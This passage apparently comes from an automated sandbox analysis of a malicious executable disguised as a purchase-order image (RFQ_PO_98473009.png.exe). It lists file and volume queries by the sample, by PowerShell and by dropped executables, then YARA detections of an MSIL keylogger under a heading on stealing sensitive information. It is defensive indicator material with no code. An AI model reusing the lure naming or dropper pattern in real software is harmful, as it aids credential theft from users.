                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\lVbhkOPdhyxT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exeCode function: 10_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,10_2_00412A15
                      Source: C:\Users\user\Desktop\RFQ_PO_98473009.png.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected MSIL Logger
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.223183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3616478.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.3510190.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b2746.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.2232746.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPE
